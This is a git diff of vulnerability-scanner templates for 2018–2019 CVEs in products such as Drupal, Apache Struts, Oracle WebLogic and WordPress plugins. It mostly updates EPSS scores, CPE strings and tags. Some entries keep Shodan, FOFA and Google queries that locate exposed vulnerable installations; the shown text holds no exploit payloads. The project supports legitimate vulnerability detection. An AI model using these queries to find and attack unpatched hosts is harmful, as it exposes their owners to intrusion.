--- a/http/cves/2018/CVE-2018-2791.yaml
+++ b/http/cves/2018/CVE-2018-2791.yaml
@@ -17,6 +17,7 @@ info:
cve-id: CVE-2018-2791
epss-score: 0.03569
cpe: cpe:2.3:a:oracle:webcenter_sites:11.1.1.8.0:*:*:*:*:*:*:*
+ epss-percentile: 0.90407
metadata:
max-request: 2
vendor: oracle
diff --git a/http/cves/2018/CVE-2018-2894.yaml b/http/cves/2018/CVE-2018-2894.yaml
index 2ed4634a2d..a511b9af15 100644
--- a/http/cves/2018/CVE-2018-2894.yaml
+++ b/http/cves/2018/CVE-2018-2894.yaml
@@ -18,6 +18,7 @@ info:
cve-id: CVE-2018-2894
epss-score: 0.9734
cpe: cpe:2.3:a:oracle:weblogic_server:10.3.6.0.0:*:*:*:*:*:*:*
+ epss-percentile: 0.99824
metadata:
max-request: 3
vendor: oracle
diff --git a/http/cves/2018/CVE-2018-3167.yaml b/http/cves/2018/CVE-2018-3167.yaml
index a15f878805..9259eeaac9 100644
--- a/http/cves/2018/CVE-2018-3167.yaml
+++ b/http/cves/2018/CVE-2018-3167.yaml
@@ -15,8 +15,9 @@ info:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cve-id: CVE-2018-3167
- epss-score: 0.01545
+ epss-score: 0.01454
cpe: cpe:2.3:a:oracle:application_management_pack:12.1.3:*:*:*:*:e-business_suite:*:*
+ epss-percentile: 0.85018
metadata:
max-request: 1
framework: e-business_suite
diff --git a/http/cves/2018/CVE-2018-3238.yaml b/http/cves/2018/CVE-2018-3238.yaml
index d289951dcd..fd2f039960 100644
--- a/http/cves/2018/CVE-2018-3238.yaml
+++ b/http/cves/2018/CVE-2018-3238.yaml
@@ -14,8 +14,9 @@ info:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:L/A:N
cvss-score: 6.9
cve-id: CVE-2018-3238
- epss-score: 0.00344
+ epss-score: 0.00332
cpe: cpe:2.3:a:oracle:webcenter_sites:11.1.1.8.0:*:*:*:*:*:*:*
+ epss-percentile: 0.67419
metadata:
max-request: 3
vendor: oracle
diff --git a/http/cves/2018/CVE-2018-3714.yaml b/http/cves/2018/CVE-2018-3714.yaml
index 5e550c8cb6..292f62f1a6 100644
--- a/http/cves/2018/CVE-2018-3714.yaml
+++ b/http/cves/2018/CVE-2018-3714.yaml
@@ -15,6 +15,7 @@ info:
cwe-id: CWE-22
epss-score: 0.00364
cpe: cpe:2.3:a:node-srv_project:node-srv:*:*:*:*:*:node.js:*:*
+ epss-percentile: 0.68884
metadata:
max-request: 1
framework: node.js
diff --git a/http/cves/2018/CVE-2018-3760.yaml b/http/cves/2018/CVE-2018-3760.yaml
index cca07b23e0..909f4e89e0 100644
--- a/http/cves/2018/CVE-2018-3760.yaml
+++ b/http/cves/2018/CVE-2018-3760.yaml
@@ -19,6 +19,7 @@ info:
cwe-id: CWE-200,CWE-22
epss-score: 0.05013
cpe: cpe:2.3:a:redhat:cloudforms:4.5:*:*:*:*:*:*:*
+ epss-percentile: 0.91853
metadata:
max-request: 2
vendor: redhat
diff --git a/http/cves/2018/CVE-2018-3810.yaml b/http/cves/2018/CVE-2018-3810.yaml
index e90dc9a360..02428449e6 100644
--- a/http/cves/2018/CVE-2018-3810.yaml
+++ b/http/cves/2018/CVE-2018-3810.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2018-3810
cwe-id: CWE-287
- epss-score: 0.90148
+ epss-score: 0.8409
cpe: cpe:2.3:a:oturia:smart_google_code_inserter:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.9803
metadata:
max-request: 2
framework: wordpress
diff --git a/http/cves/2018/CVE-2018-5230.yaml b/http/cves/2018/CVE-2018-5230.yaml
index 24e9e0a20b..508be2f986 100644
--- a/http/cves/2018/CVE-2018-5230.yaml
+++ b/http/cves/2018/CVE-2018-5230.yaml
@@ -16,6 +16,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00211
cpe: cpe:2.3:a:atlassian:jira:*:*:*:*:*:*:*:*
+ epss-percentile: 0.58311
metadata:
max-request: 1
shodan-query: http.component:"Atlassian Confluence"
diff --git a/http/cves/2018/CVE-2018-5233.yaml b/http/cves/2018/CVE-2018-5233.yaml
index 31184ff754..880d80e11d 100644
--- a/http/cves/2018/CVE-2018-5233.yaml
+++ b/http/cves/2018/CVE-2018-5233.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00295
cpe: cpe:2.3:a:getgrav:grav_cms:*:*:*:*:*:*:*:*
+ epss-percentile: 0.65386
metadata:
max-request: 1
shodan-query: html:"Grav CMS"
@@ -51,4 +52,4 @@ http:
- type: status
status:
- - 200
\ No newline at end of file
+ - 200
diff --git a/http/cves/2018/CVE-2018-5316.yaml b/http/cves/2018/CVE-2018-5316.yaml
index aa211cb3a3..7287513a41 100644
--- a/http/cves/2018/CVE-2018-5316.yaml
+++ b/http/cves/2018/CVE-2018-5316.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00175
cpe: cpe:2.3:a:patsatech:sagepay_server_gateway_for_woocommerce:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.53966
metadata:
max-request: 1
verified: true
@@ -46,4 +47,4 @@ http:
- type: status
status:
- - 200
\ No newline at end of file
+ - 200
diff --git a/http/cves/2018/CVE-2018-5715.yaml b/http/cves/2018/CVE-2018-5715.yaml
index a924a642bf..cf425d264f 100644
--- a/http/cves/2018/CVE-2018-5715.yaml
+++ b/http/cves/2018/CVE-2018-5715.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00129
cpe: cpe:2.3:a:sugarcrm:sugarcrm:3.5.1:*:*:*:*:*:*:*
+ epss-percentile: 0.46905
metadata:
max-request: 1
google-query: intext:"SugarCRM Inc. All Rights Reserved"
diff --git a/http/cves/2018/CVE-2018-6008.yaml b/http/cves/2018/CVE-2018-6008.yaml
index 8442ac5615..469f68fb44 100644
--- a/http/cves/2018/CVE-2018-6008.yaml
+++ b/http/cves/2018/CVE-2018-6008.yaml
@@ -16,6 +16,7 @@ info:
cwe-id: CWE-200
epss-score: 0.41482
cpe: cpe:2.3:a:joomlatag:jtag_members_directory:5.3.7:*:*:*:*:joomla\!:*:*
+ epss-percentile: 0.96813
metadata:
max-request: 1
framework: joomla\!
diff --git a/http/cves/2018/CVE-2018-6184.yaml b/http/cves/2018/CVE-2018-6184.yaml
index 5aaad04dab..4a005c7c1b 100644
--- a/http/cves/2018/CVE-2018-6184.yaml
+++ b/http/cves/2018/CVE-2018-6184.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-22
epss-score: 0.00396
cpe: cpe:2.3:a:zeit:next.js:4.0.0:*:*:*:*:*:*:*
+ epss-percentile: 0.70146
metadata:
max-request: 1
shodan-query: html:"/_next/static"
diff --git a/http/cves/2018/CVE-2018-6200.yaml b/http/cves/2018/CVE-2018-6200.yaml
index 106c56ecaa..a319400f37 100644
--- a/http/cves/2018/CVE-2018-6200.yaml
+++ b/http/cves/2018/CVE-2018-6200.yaml
@@ -16,6 +16,7 @@ info:
cwe-id: CWE-601
epss-score: 0.00118
cpe: cpe:2.3:a:vbulletin:vbulletin:*:*:*:*:*:*:*:*
+ epss-percentile: 0.45103
metadata:
max-request: 2
verified: true
diff --git a/http/cves/2018/CVE-2018-6530.yaml b/http/cves/2018/CVE-2018-6530.yaml
index c1df546c47..c03239d6c2 100644
--- a/http/cves/2018/CVE-2018-6530.yaml
+++ b/http/cves/2018/CVE-2018-6530.yaml
@@ -19,6 +19,7 @@ info:
cwe-id: CWE-78
epss-score: 0.94099
cpe: cpe:2.3:o:d-link:dir-860l_firmware:*:*:*:*:*:*:*:*
+ epss-percentile: 0.98828
metadata:
max-request: 1
vendor: d-link
diff --git a/http/cves/2018/CVE-2018-6910.yaml b/http/cves/2018/CVE-2018-6910.yaml
index 515a5e0fda..2aa22de0f2 100644
--- a/http/cves/2018/CVE-2018-6910.yaml
+++ b/http/cves/2018/CVE-2018-6910.yaml
@@ -16,6 +16,7 @@ info:
cwe-id: CWE-668
epss-score: 0.03367
cpe: cpe:2.3:a:dedecms:dedecms:5.7:*:*:*:*:*:*:*
+ epss-percentile: 0.90157
metadata:
max-request: 1
vendor: dedecms
diff --git a/http/cves/2018/CVE-2018-7251.yaml b/http/cves/2018/CVE-2018-7251.yaml
index e6fd1443cb..bbc1fac9f7 100644
--- a/http/cves/2018/CVE-2018-7251.yaml
+++ b/http/cves/2018/CVE-2018-7251.yaml
@@ -19,6 +19,7 @@ info:
cwe-id: CWE-200
epss-score: 0.06473
cpe: cpe:2.3:a:anchorcms:anchor:0.12.3:*:*:*:*:*:*:*
+ epss-percentile: 0.92792
metadata:
max-request: 1
vendor: anchorcms
diff --git a/http/cves/2018/CVE-2018-7422.yaml b/http/cves/2018/CVE-2018-7422.yaml
index 93c2c34af7..1fa86fc2fa 100644
--- a/http/cves/2018/CVE-2018-7422.yaml
+++ b/http/cves/2018/CVE-2018-7422.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 7.5
cve-id: CVE-2018-7422
cwe-id: CWE-22
- epss-score: 0.95458
+ epss-score: 0.95295
cpe: cpe:2.3:a:siteeditor:site_editor:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.99068
metadata:
max-request: 2
framework: wordpress
diff --git a/http/cves/2018/CVE-2018-7467.yaml b/http/cves/2018/CVE-2018-7467.yaml
index b6d64bfb40..cfd937634e 100644
--- a/http/cves/2018/CVE-2018-7467.yaml
+++ b/http/cves/2018/CVE-2018-7467.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-22
epss-score: 0.00396
cpe: cpe:2.3:a:axxonsoft:next:-:*:*:*:*:*:*:*
+ epss-percentile: 0.70146
metadata:
max-request: 1
vendor: axxonsoft
diff --git a/http/cves/2018/CVE-2018-7490.yaml b/http/cves/2018/CVE-2018-7490.yaml
index 4074e8d6fb..61dc578f76 100644
--- a/http/cves/2018/CVE-2018-7490.yaml
+++ b/http/cves/2018/CVE-2018-7490.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 7.5
cve-id: CVE-2018-7490
cwe-id: CWE-22
- epss-score: 0.97067
+ epss-score: 0.9656
cpe: cpe:2.3:a:unbit:uwsgi:*:*:*:*:*:*:*:*
+ epss-percentile: 0.99436
metadata:
max-request: 1
vendor: unbit
diff --git a/http/cves/2018/CVE-2018-7600.yaml b/http/cves/2018/CVE-2018-7600.yaml
index 1800ad4526..c9a9f3184e 100644
--- a/http/cves/2018/CVE-2018-7600.yaml
+++ b/http/cves/2018/CVE-2018-7600.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2018-7600
cwe-id: CWE-20
- epss-score: 0.9757
+ epss-score: 0.97553
cpe: cpe:2.3:a:drupal:drupal:*:*:*:*:*:*:*:*
+ epss-percentile: 0.99994
metadata:
max-request: 1
shodan-query: http.component:"drupal"
diff --git a/http/cves/2018/CVE-2018-7602.yaml b/http/cves/2018/CVE-2018-7602.yaml
index f33c92d571..a7e9233e51 100644
--- a/http/cves/2018/CVE-2018-7602.yaml
+++ b/http/cves/2018/CVE-2018-7602.yaml
@@ -15,8 +15,9 @@ info:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2018-7602
- epss-score: 0.97474
+ epss-score: 0.97471
cpe: cpe:2.3:a:drupal:drupal:*:*:*:*:*:*:*:*
+ epss-percentile: 0.99942
metadata:
max-request: 4
shodan-query: http.component:"drupal"
diff --git a/http/cves/2018/CVE-2018-7653.yaml b/http/cves/2018/CVE-2018-7653.yaml
index 3207bc02d2..92e74e1589 100644
--- a/http/cves/2018/CVE-2018-7653.yaml
+++ b/http/cves/2018/CVE-2018-7653.yaml
@@ -8,15 +8,22 @@ info:
reference:
- https://packetstormsecurity.com/files/147065/YzmCMS-3.6-Cross-Site-Scripting.html
- https://nvd.nist.gov/vuln/detail/CVE-2018-7653
+ - https://github.com/ponyma233/YzmCMS/blob/master/YzmCMS_3.6_bug.md
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
+ cve-id: CVE-2018-7653
cwe-id: CWE-79
+ epss-score: 0.00797
+ cpe: cpe:2.3:a:yzmcms:yzmcms:3.6:*:*:*:*:*:*:*
+ epss-percentile: 0.79437
metadata:
max-request: 1
fofa-query: title="YzmCMS"
shodan-query: title:"YzmCMS"
- tags: cve,cve2018,yzmcms,cms,xss
+ vendor: yzmcms
+ product: yzmcms
+ tags: packetstorm,cve,cve2018,yzmcms,cms,xss
http:
- method: GET
diff --git a/http/cves/2018/CVE-2018-7662.yaml b/http/cves/2018/CVE-2018-7662.yaml
index 3dee8efd4f..5251c442d2 100644
--- a/http/cves/2018/CVE-2018-7662.yaml
+++ b/http/cves/2018/CVE-2018-7662.yaml
@@ -15,6 +15,7 @@ info:
cwe-id: CWE-200
epss-score: 0.00286
cpe: cpe:2.3:a:couchcms:couch:*:*:*:*:*:*:*:*
+ epss-percentile: 0.64709
metadata:
max-request: 2
vendor: couchcms
diff --git a/http/cves/2018/CVE-2018-7700.yaml b/http/cves/2018/CVE-2018-7700.yaml
index 7484fe09fa..6a792813d7 100644
--- a/http/cves/2018/CVE-2018-7700.yaml
+++ b/http/cves/2018/CVE-2018-7700.yaml
@@ -16,6 +16,7 @@ info:
cwe-id: CWE-352
epss-score: 0.73235
cpe: cpe:2.3:a:dedecms:dedecms:5.7:*:*:*:*:*:*:*
+ epss-percentile: 0.97671
metadata:
max-request: 1
vendor: dedecms
diff --git a/http/cves/2018/CVE-2018-7719.yaml b/http/cves/2018/CVE-2018-7719.yaml
index 044b6e35ef..8284e89463 100644
--- a/http/cves/2018/CVE-2018-7719.yaml
+++ b/http/cves/2018/CVE-2018-7719.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 7.5
cve-id: CVE-2018-7719
cwe-id: CWE-22
- epss-score: 0.10678
+ epss-score: 0.09221
cpe: cpe:2.3:a:acrolinx:acrolinx_server:*:*:*:*:*:*:*:*
+ epss-percentile: 0.93888
metadata:
max-request: 1
vendor: acrolinx
diff --git a/http/cves/2018/CVE-2018-8006.yaml b/http/cves/2018/CVE-2018-8006.yaml
index 4afe719a03..6672e0dbf0 100644
--- a/http/cves/2018/CVE-2018-8006.yaml
+++ b/http/cves/2018/CVE-2018-8006.yaml
@@ -21,8 +21,9 @@ info:
cvss-score: 6.1
cve-id: CVE-2018-8006
cwe-id: CWE-79
- epss-score: 0.97273
+ epss-score: 0.97239
cpe: cpe:2.3:a:apache:activemq:*:*:*:*:*:*:*:*
+ epss-percentile: 0.99756
metadata:
max-request: 1
vendor: apache
diff --git a/http/cves/2018/CVE-2018-8033.yaml b/http/cves/2018/CVE-2018-8033.yaml
index de54a2c9a2..430fcdd63d 100644
--- a/http/cves/2018/CVE-2018-8033.yaml
+++ b/http/cves/2018/CVE-2018-8033.yaml
@@ -14,8 +14,9 @@ info:
cvss-score: 7.5
cve-id: CVE-2018-8033
cwe-id: CWE-200
- epss-score: 0.00242
+ epss-score: 0.20111
cpe: cpe:2.3:a:apache:ofbiz:*:*:*:*:*:*:*:*
+ epss-percentile: 0.95689
metadata:
max-request: 1
vendor: apache
diff --git a/http/cves/2018/CVE-2018-8715.yaml b/http/cves/2018/CVE-2018-8715.yaml
index e942e4d665..55db64892d 100644
--- a/http/cves/2018/CVE-2018-8715.yaml
+++ b/http/cves/2018/CVE-2018-8715.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 8.1
cve-id: CVE-2018-8715
cwe-id: CWE-287
- epss-score: 0.00844
+ epss-score: 0.05837
cpe: cpe:2.3:a:embedthis:appweb:*:*:*:*:*:*:*:*
+ epss-percentile: 0.92425
metadata:
max-request: 1
vendor: embedthis
diff --git a/http/cves/2018/CVE-2018-8719.yaml b/http/cves/2018/CVE-2018-8719.yaml
index 79c52d8d86..7c43e763ee 100644
--- a/http/cves/2018/CVE-2018-8719.yaml
+++ b/http/cves/2018/CVE-2018-8719.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 5.3
cve-id: CVE-2018-8719
cwe-id: CWE-532
- epss-score: 0.03728
+ epss-score: 0.03177
cpe: cpe:2.3:a:wpsecurityauditlog:wp_security_audit_log:3.1.1:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.89877
metadata:
max-request: 1
framework: wordpress
diff --git a/http/cves/2018/CVE-2018-8727.yaml b/http/cves/2018/CVE-2018-8727.yaml
index 6ee0e136f4..ee6c67333b 100644
--- a/http/cves/2018/CVE-2018-8727.yaml
+++ b/http/cves/2018/CVE-2018-8727.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-22
epss-score: 0.01105
cpe: cpe:2.3:a:mirasys:dvms_workstation:*:*:*:*:*:*:*:*
+ epss-percentile: 0.8267
metadata:
max-request: 1
vendor: mirasys
diff --git a/http/cves/2018/CVE-2018-8770.yaml b/http/cves/2018/CVE-2018-8770.yaml
index 1b8f82c1be..5cad1eb764 100644
--- a/http/cves/2018/CVE-2018-8770.yaml
+++ b/http/cves/2018/CVE-2018-8770.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 5.3
cve-id: CVE-2018-8770
cwe-id: CWE-200
- epss-score: 0.00282
+ epss-score: 0.00197
cpe: cpe:2.3:a:cobub:razor:0.8.0:*:*:*:*:*:*:*
+ epss-percentile: 0.5678
metadata:
max-request: 1
vendor: cobub
diff --git a/http/cves/2018/CVE-2018-9118.yaml b/http/cves/2018/CVE-2018-9118.yaml
index abbeb190c7..487600f951 100644
--- a/http/cves/2018/CVE-2018-9118.yaml
+++ b/http/cves/2018/CVE-2018-9118.yaml
@@ -20,6 +20,7 @@ info:
cwe-id: CWE-22
epss-score: 0.11263
cpe: cpe:2.3:a:99robots:wp_background_takeover_advertisements:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.94454
metadata:
max-request: 1
framework: wordpress
diff --git a/http/cves/2018/CVE-2018-9161.yaml b/http/cves/2018/CVE-2018-9161.yaml
index 5ec77cdc99..1e8b84d719 100644
--- a/http/cves/2018/CVE-2018-9161.yaml
+++ b/http/cves/2018/CVE-2018-9161.yaml
@@ -14,8 +14,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2018-9161
cwe-id: CWE-798
- epss-score: 0.23131
+ epss-score: 0.26342
cpe: cpe:2.3:a:prismaindustriale:checkweigher_prismaweb:1.21:*:*:*:*:*:*:*
+ epss-percentile: 0.96118
metadata:
max-request: 1
vendor: prismaindustriale
diff --git a/http/cves/2018/CVE-2018-9205.yaml b/http/cves/2018/CVE-2018-9205.yaml
index 447b8395dc..8556ebcaee 100644
--- a/http/cves/2018/CVE-2018-9205.yaml
+++ b/http/cves/2018/CVE-2018-9205.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 7.5
cve-id: CVE-2018-9205
cwe-id: CWE-22
- epss-score: 0.0389
+ epss-score: 0.0276
cpe: cpe:2.3:a:drupal:avatar_uploader:7.x-1.0:beta8:*:*:*:*:*:*
+ epss-percentile: 0.89249
metadata:
max-request: 1
shodan-query: http.component:"drupal"
diff --git a/http/cves/2018/CVE-2018-9845.yaml b/http/cves/2018/CVE-2018-9845.yaml
index d958052f67..13fa5e18d7 100644
--- a/http/cves/2018/CVE-2018-9845.yaml
+++ b/http/cves/2018/CVE-2018-9845.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-178
epss-score: 0.01342
cpe: cpe:2.3:a:etherpad:etherpad_lite:*:*:*:*:*:*:*:*
+ epss-percentile: 0.84419
metadata:
max-request: 1
vendor: etherpad
diff --git a/http/cves/2018/CVE-2018-9995.yaml b/http/cves/2018/CVE-2018-9995.yaml
index 7c12571bf2..01868660b5 100644
--- a/http/cves/2018/CVE-2018-9995.yaml
+++ b/http/cves/2018/CVE-2018-9995.yaml
@@ -18,8 +18,9 @@ info:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2018-9995
- epss-score: 0.94839
+ epss-score: 0.93843
cpe: cpe:2.3:o:tbkvision:tbk-dvr4216_firmware:-:*:*:*:*:*:*:*
+ epss-percentile: 0.98791
metadata:
max-request: 1
vendor: tbkvision
diff --git a/http/cves/2019/CVE-2019-0193.yaml b/http/cves/2019/CVE-2019-0193.yaml
index 58c8db2af9..29547d4b76 100644
--- a/http/cves/2019/CVE-2019-0193.yaml
+++ b/http/cves/2019/CVE-2019-0193.yaml
@@ -19,8 +19,9 @@ info:
cvss-score: 7.2
cve-id: CVE-2019-0193
cwe-id: CWE-94
- epss-score: 0.94457
+ epss-score: 0.95869
cpe: cpe:2.3:a:apache:solr:*:*:*:*:*:*:*:*
+ epss-percentile: 0.99213
metadata:
max-request: 2
vendor: apache
diff --git a/http/cves/2019/CVE-2019-0221.yaml b/http/cves/2019/CVE-2019-0221.yaml
index e2a08e0d0a..5bf14df652 100644
--- a/http/cves/2019/CVE-2019-0221.yaml
+++ b/http/cves/2019/CVE-2019-0221.yaml
@@ -19,13 +19,13 @@ info:
cwe-id: CWE-79
epss-score: 0.01651
cpe: cpe:2.3:a:apache:tomcat:*:*:*:*:*:*:*:*
+ epss-percentile: 0.86008
metadata:
max-request: 2
shodan-query: title:"Apache Tomcat"
vendor: apache
product: tomcat
tags: apache,xss,tomcat,seclists,edb,cve,cve2019
-
variables:
payload: ""
diff --git a/http/cves/2019/CVE-2019-0230.yaml b/http/cves/2019/CVE-2019-0230.yaml
index 7112ba0dcc..c1c8500cad 100644
--- a/http/cves/2019/CVE-2019-0230.yaml
+++ b/http/cves/2019/CVE-2019-0230.yaml
@@ -16,14 +16,14 @@ info:
cvss-score: 9.8
cve-id: CVE-2019-0230
cwe-id: CWE-1321
- epss-score: 0.90834
+ epss-score: 0.92614
cpe: cpe:2.3:a:apache:struts:*:*:*:*:*:*:*:*
+ epss-percentile: 0.98622
metadata:
max-request: 1
vendor: apache
product: struts
tags: tenable,packetstorm,struts,rce,cve,cve2019,apache
-
variables:
str: "{{rand_base(6)}}"
diff --git a/http/cves/2019/CVE-2019-10068.yaml b/http/cves/2019/CVE-2019-10068.yaml
index 756b87d5c1..90b5cc6ebb 100644
--- a/http/cves/2019/CVE-2019-10068.yaml
+++ b/http/cves/2019/CVE-2019-10068.yaml
@@ -18,6 +18,7 @@ info:
cwe-id: CWE-502
epss-score: 0.97358
cpe: cpe:2.3:a:kentico:kentico:*:*:*:*:*:*:*:*
+ epss-percentile: 0.9984
metadata:
max-request: 1
vendor: kentico
diff --git a/http/cves/2019/CVE-2019-10092.yaml b/http/cves/2019/CVE-2019-10092.yaml
index cdc8861edd..3f1c45f0f7 100644
--- a/http/cves/2019/CVE-2019-10092.yaml
+++ b/http/cves/2019/CVE-2019-10092.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 6.1
cve-id: CVE-2019-10092
cwe-id: CWE-79
- epss-score: 0.00757
+ epss-score: 0.01582
cpe: cpe:2.3:a:apache:http_server:*:*:*:*:*:*:*:*
+ epss-percentile: 0.8571
metadata:
max-request: 1
vendor: apache
diff --git a/http/cves/2019/CVE-2019-10098.yaml b/http/cves/2019/CVE-2019-10098.yaml
index 901650d6dd..a41adf2ad6 100644
--- a/http/cves/2019/CVE-2019-10098.yaml
+++ b/http/cves/2019/CVE-2019-10098.yaml
@@ -18,8 +18,9 @@ info:
cvss-score: 6.1
cve-id: CVE-2019-10098
cwe-id: CWE-601
- epss-score: 0.07268
+ epss-score: 0.08306
cpe: cpe:2.3:a:apache:http_server:*:*:*:*:*:*:*:*
+ epss-percentile: 0.9354
metadata:
max-request: 1
vendor: apache
diff --git a/http/cves/2019/CVE-2019-1010287.yaml b/http/cves/2019/CVE-2019-1010287.yaml
index e1bf2b71f9..bddf843827 100644
--- a/http/cves/2019/CVE-2019-1010287.yaml
+++ b/http/cves/2019/CVE-2019-1010287.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00129
cpe: cpe:2.3:a:timesheet_next_gen_project:timesheet_next_gen:*:*:*:*:*:*:*:*
+ epss-percentile: 0.46935
metadata:
max-request: 1
google-query: inurl:"/timesheet/login.php"
diff --git a/http/cves/2019/CVE-2019-1010290.yaml b/http/cves/2019/CVE-2019-1010290.yaml
index c31a2e7fd7..ef2c47a0a3 100644
--- a/http/cves/2019/CVE-2019-1010290.yaml
+++ b/http/cves/2019/CVE-2019-1010290.yaml
@@ -16,6 +16,7 @@ info:
cwe-id: CWE-601
epss-score: 0.00198
cpe: cpe:2.3:a:cmsmadesimple:bable\:multilingual_site:*:*:*:*:*:cms_made_simple:*:*
+ epss-percentile: 0.56887
metadata:
max-request: 1
vendor: cmsmadesimple
diff --git a/http/cves/2019/CVE-2019-10232.yaml b/http/cves/2019/CVE-2019-10232.yaml
index 90557076ad..678fe55d49 100644
--- a/http/cves/2019/CVE-2019-10232.yaml
+++ b/http/cves/2019/CVE-2019-10232.yaml
@@ -14,8 +14,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2019-10232
cwe-id: CWE-89
- epss-score: 0.16114
+ epss-score: 0.21939
cpe: cpe:2.3:a:teclib-edition:gestionnaire_libre_de_parc_informatique:*:*:*:*:*:*:*:*
+ epss-percentile: 0.95827
metadata:
max-request: 2
vendor: teclib-edition
diff --git a/http/cves/2019/CVE-2019-10405.yaml b/http/cves/2019/CVE-2019-10405.yaml
index 87d2ee0c55..5e1d71c203 100644
--- a/http/cves/2019/CVE-2019-10405.yaml
+++ b/http/cves/2019/CVE-2019-10405.yaml
@@ -16,6 +16,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00572
cpe: cpe:2.3:a:jenkins:jenkins:*:*:*:*:lts:*:*:*
+ epss-percentile: 0.75075
metadata:
max-request: 2
shodan-query: http.favicon.hash:81586312
diff --git a/http/cves/2019/CVE-2019-10475.yaml b/http/cves/2019/CVE-2019-10475.yaml
index bc9f0629da..b85924998f 100644
--- a/http/cves/2019/CVE-2019-10475.yaml
+++ b/http/cves/2019/CVE-2019-10475.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 6.1
cve-id: CVE-2019-10475
cwe-id: CWE-79
- epss-score: 0.9726
+ epss-score: 0.97301
cpe: cpe:2.3:a:jenkins:build-metrics:*:*:*:*:*:jenkins:*:*
+ epss-percentile: 0.99796
metadata:
max-request: 1
framework: jenkins
diff --git a/http/cves/2019/CVE-2019-10692.yaml b/http/cves/2019/CVE-2019-10692.yaml
index 9b04907b7d..aea3a1502e 100644
--- a/http/cves/2019/CVE-2019-10692.yaml
+++ b/http/cves/2019/CVE-2019-10692.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2019-10692
cwe-id: CWE-89
- epss-score: 0.97382
+ epss-score: 0.9737
cpe: cpe:2.3:a:codecabin:wp_go_maps:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.9985
metadata:
max-request: 1
verified: true
diff --git a/http/cves/2019/CVE-2019-10717.yaml b/http/cves/2019/CVE-2019-10717.yaml
index f6d825f5ce..69e24fcf69 100644
--- a/http/cves/2019/CVE-2019-10717.yaml
+++ b/http/cves/2019/CVE-2019-10717.yaml
@@ -18,6 +18,7 @@ info:
cwe-id: CWE-22
epss-score: 0.0042
cpe: cpe:2.3:a:dotnetblogengine:blogengine.net:3.3.7.0:*:*:*:*:*:*:*
+ epss-percentile: 0.7095
metadata:
max-request: 1
shodan-query: http.html:"Blogengine.net"
diff --git a/http/cves/2019/CVE-2019-10758.yaml b/http/cves/2019/CVE-2019-10758.yaml
index bb3f2cbf4d..cc4fdc2921 100644
--- a/http/cves/2019/CVE-2019-10758.yaml
+++ b/http/cves/2019/CVE-2019-10758.yaml
@@ -16,6 +16,7 @@ info:
cve-id: CVE-2019-10758
epss-score: 0.97345
cpe: cpe:2.3:a:mongo-express_project:mongo-express:*:*:*:*:*:node.js:*:*
+ epss-percentile: 0.99831
metadata:
max-request: 1
shodan-query: http.title:"Mongo Express"
diff --git a/http/cves/2019/CVE-2019-11013.yaml b/http/cves/2019/CVE-2019-11013.yaml
index 4930f61752..d33f3812f3 100644
--- a/http/cves/2019/CVE-2019-11013.yaml
+++ b/http/cves/2019/CVE-2019-11013.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-22
epss-score: 0.01775
cpe: cpe:2.3:a:softvelum:nimble_streamer:*:*:*:*:*:*:*:*
+ epss-percentile: 0.86476
metadata:
max-request: 1
vendor: softvelum
diff --git a/http/cves/2019/CVE-2019-11248.yaml b/http/cves/2019/CVE-2019-11248.yaml
index 0c3bd4c6d5..b38d1eec41 100644
--- a/http/cves/2019/CVE-2019-11248.yaml
+++ b/http/cves/2019/CVE-2019-11248.yaml
@@ -16,9 +16,10 @@ info:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:L
cvss-score: 8.2
cve-id: CVE-2019-11248
- cwe-id: CWE-862,CWE-419
+ cwe-id: CWE-419,CWE-862
epss-score: 0.74826
cpe: cpe:2.3:a:kubernetes:kubernetes:*:*:*:*:*:*:*:*
+ epss-percentile: 0.97731
metadata:
max-request: 2
vendor: kubernetes
diff --git a/http/cves/2019/CVE-2019-11370.yaml b/http/cves/2019/CVE-2019-11370.yaml
index 9ba2a95078..2c4bdcb923 100644
--- a/http/cves/2019/CVE-2019-11370.yaml
+++ b/http/cves/2019/CVE-2019-11370.yaml
@@ -17,6 +17,7 @@ info:
